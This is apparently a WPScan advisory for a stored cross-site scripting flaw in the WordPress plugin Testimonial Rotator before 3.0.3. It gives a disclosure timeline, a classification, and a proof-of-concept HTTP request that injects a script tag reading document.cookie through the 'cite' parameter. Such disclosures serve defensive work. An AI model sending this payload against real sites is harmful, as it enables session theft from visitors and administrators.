Testimonial Rotator < 3.0.3 - Authenticated Stored Cross-Site Scripting (XSS)



Description
A Stored XSS vulnerability has been found in the 'Author Information' textarea in testimonials from the plugin, which could allow an authenticated medium-privileged user (contributor+) to inject arbitrary JavaScript. The XSS will be triggered for anyone visiting public posts or testimonial page listing in the backend.

The filter work by javascript, thus if user intercepts request and insert payload in "cite" parameter, the payload will be stored in the database. 

Edit (WPScanTeam):
May 9th, 2020 - Confirmed & Escalated to WP Plugins Team
May 11st, 2020 - WP Plugins Team Investigating
June 16th, 2020 - v3.0.3 released, fixing the issue.
Proof of Concept
POST /wp-admin/post.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=136&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1381
Origin: http://example.com
Cookies; [SNIPPED]
Connection: close

[SNIPPED]&cite=<a href="http://google.com">http://google.com</a><script>alert(document.cookie)</script>

Affects Plugin

fixed in version 3.0.3

References

Youtube Video

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Vu Dong - SunSCR
Submitter Vu Dong - SunSCR
Views 1075
Verified Yes
WPVDB ID 10272

Timeline

Publicly Published 2020-06-17 (24 days ago)
Added 2020-06-17 (24 days ago)
Last Updated 2020-06-18 (23 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin